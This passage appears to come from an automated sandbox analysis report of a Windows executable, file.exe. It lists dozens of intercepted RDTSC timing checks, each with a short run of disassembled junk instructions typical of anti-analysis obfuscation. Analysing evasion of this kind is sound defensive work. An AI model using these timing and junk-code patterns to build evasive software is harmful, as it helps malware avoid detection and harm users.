              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A3818 second address: 3A3865 instructions: 0x00000000 rdtsc 0x00000002 je 00007FE90543D6BAh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007FE90543D6C5h 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007FE90543D6C1h 0x00000019 jbe 00007FE90543D6B6h 0x0000001f popad 0x00000020 jmp 00007FE90543D6BDh 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 356705 second address: 35670A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35670A second address: 356710 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 356710 second address: 35674A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pop ebx 0x0000000e nop 0x0000000f mov dword ptr [ebp+122D36EDh], eax 0x00000015 mov ebx, dword ptr [ebp+1248D6C1h] 0x0000001b and edi, dword ptr [ebp+122D2D64h] 0x00000021 add eax, ebx 0x00000023 je 00007FE9047A81CCh 0x00000029 sub dword ptr [ebp+124536B4h], esi 0x0000002f push eax 0x00000030 push eax 0x00000031 push edx 0x00000032 jnp 00007FE9047A81C8h 0x00000038 push ebx 0x00000039 pop ebx 0x0000003a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35674A second address: 356788 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE90543D6BAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007FE90543D6B8h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 00000014h 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 add dword ptr [ebp+12464CBFh], ebx 0x0000002c push 00000004h 0x0000002e push esi 0x0000002f clc 0x00000030 pop ecx 0x00000031 push eax 0x00000032 pushad 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 pop eax 0x00000037 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A3B46 second address: 3A3B4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A3B4C second address: 3A3B50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A3B50 second address: 3A3B56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A6CE2 second address: 3A6CF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE90543D6BDh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3AF118 second address: 3AF159 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE9047A81D9h 0x00000009 popad 0x0000000a pop ebx 0x0000000b pushad 0x0000000c jl 00007FE9047A81DDh 0x00000012 jmp 00007FE9047A81D7h 0x00000017 push eax 0x00000018 push edx 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3ACFD2 second address: 3ACFDC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3AD292 second address: 3AD2C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE9047A81D2h 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007FE9047A81D7h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3AD934 second address: 3AD93B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3AD93B second address: 3AD951 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ecx 0x00000008 jg 00007FE9047A81D2h 0x0000000e jl 00007FE9047A81C6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3ADC11 second address: 3ADC4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE90543D6C8h 0x00000009 pop edi 0x0000000a jg 00007FE90543D6B8h 0x00000010 pushad 0x00000011 popad 0x00000012 pop edi 0x00000013 pushad 0x00000014 jmp 00007FE90543D6BCh 0x00000019 push eax 0x0000001a push edx 0x0000001b jp 00007FE90543D6B6h 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3ADF2B second address: 3ADF2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3ADF2F second address: 3ADF46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE90543D6BCh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3AE242 second address: 3AE249 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3AE249 second address: 3AE264 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jc 00007FE90543D6B6h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e jmp 00007FE90543D6BBh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3AE53B second address: 3AE572 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9047A81D3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007FE9047A81CCh 0x0000000f jc 00007FE9047A81C6h 0x00000015 jmp 00007FE9047A81CCh 0x0000001a push eax 0x0000001b push edx 0x0000001c jng 00007FE9047A81C6h 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 30C755 second address: 30C759 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 30C759 second address: 30C763 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FE9047A81C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3AEABC second address: 3AEAC4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3AEAC4 second address: 3AEACE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FE9047A81C6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3AEACE second address: 3AEAEA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007FE90543D6BCh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3AEAEA second address: 3AEAF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3AEDE0 second address: 3AEDEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FE90543D6B6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3AEDEC second address: 3AEDF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3AEDF3 second address: 3AEE0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE90543D6C3h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3AEE0C second address: 3AEE1B instructions: 0x00000000 rdtsc 0x00000002 jc 00007FE9047A81C6h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 30FBDD second address: 30FC03 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE90543D6C5h 0x00000007 pushad 0x00000008 jns 00007FE90543D6B6h 0x0000000e jp 00007FE90543D6B6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 30FC03 second address: 30FC0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 30FC0E second address: 30FC1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 30FC1B second address: 30FC1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B8F07 second address: 3B8F0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B8120 second address: 3B812D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c pop ebx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B812D second address: 3B813D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 ja 00007FE90543D6BEh 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B8396 second address: 3B839A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B839A second address: 3B839E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B839E second address: 3B83AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007FE9047A81C6h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B84F2 second address: 3B84F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B88AB second address: 3B88CD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FE9047A81D4h 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B88CD second address: 3B88D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B88D3 second address: 3B88F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push esi 0x0000000b pop esi 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e jne 00007FE9047A81C6h 0x00000014 popad 0x00000015 push edi 0x00000016 pushad 0x00000017 popad 0x00000018 jnp 00007FE9047A81C6h 0x0000001e pop edi 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B8A58 second address: 3B8A5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B8A5C second address: 3B8A68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B8A68 second address: 3B8A6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B8A6E second address: 3B8A72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3BF577 second address: 3BF57B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3BFA9E second address: 3BFAA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3BFAA2 second address: 3BFABE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007FE90543D6BCh 0x0000000c jng 00007FE90543D6B6h 0x00000012 push eax 0x00000013 push edx 0x00000014 jns 00007FE90543D6B8h 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3BFC05 second address: 3BFC13 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3BFDD5 second address: 3BFDDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FE90543D6B6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3BFDDF second address: 3BFDE7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3BFDE7 second address: 3BFE04 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007FE90543D6B6h 0x00000009 jmp 00007FE90543D6C0h 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3C00A3 second address: 3C00B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FE9047A81C6h 0x0000000a jnc 00007FE9047A81C6h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3C00B3 second address: 3C00B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3C0B03 second address: 3C0B09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3BF116 second address: 3BF13B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FE90543D6C9h 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3BF13B second address: 3BF152 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE9047A81D3h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3C7885 second address: 3C788B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3C788B second address: 3C7891 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3C726C second address: 3C7298 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007FE90543D6C6h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 jns 00007FE90543D6BCh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3C7298 second address: 3C729C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3C729C second address: 3C72C9 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FE90543D6C0h 0x00000008 jmp 00007FE90543D6BAh 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007FE90543D6C7h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3C73E9 second address: 3C73EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3C7547 second address: 3C7585 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FE90543D6B6h 0x0000000a pop edx 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FE90543D6C9h 0x00000013 jmp 00007FE90543D6C7h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3C7585 second address: 3C758B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3C758B second address: 3C758F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3C8F9A second address: 3C8FAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ebx 0x00000006 jnl 00007FE9047A81C6h 0x0000000c push edx 0x0000000d pop edx 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3C8FAD second address: 3C8FB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3C8FB3 second address: 3C8FB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3C8FB7 second address: 3C8FBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3C8FBB second address: 3C8FD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FE9047A81C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d pushad 0x0000000e popad 0x0000000f push esi 0x00000010 pop esi 0x00000011 pop ebx 0x00000012 popad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3C8FD3 second address: 3C8FFC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE90543D6C1h 0x00000007 jmp 00007FE90543D6BEh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D75D8 second address: 3D75E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9047A81CAh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D75E6 second address: 3D75F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D75F0 second address: 3D75F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D75F6 second address: 3D75FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D709D second address: 3D70AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE9047A81CAh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D9E5B second address: 3D9E6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FE90543D6B6h 0x0000000a jne 00007FE90543D6B6h 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D9E6C second address: 3D9E8C instructions: 0x00000000 rdtsc 0x00000002 jno 00007FE9047A81CAh 0x00000008 jo 00007FE9047A81C8h 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jo 00007FE9047A81CCh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D9E8C second address: 3D9EA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE90543D6C3h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D9EA3 second address: 3D9EB9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE9047A81D1h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D9EB9 second address: 3D9EBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E77DE second address: 3E7803 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FE9047A81C6h 0x0000000a jmp 00007FE9047A81D8h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E7664 second address: 3E7668 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E7668 second address: 3E766C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E766C second address: 3E7689 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FE90543D6C0h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E7689 second address: 3E769A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 pushad 0x0000000a popad 0x0000000b pop edi 0x0000000c pushad 0x0000000d push esi 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F3614 second address: 3F361E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FE90543D6B6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F361E second address: 3F3638 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FE9047A81C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE9047A81CCh 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
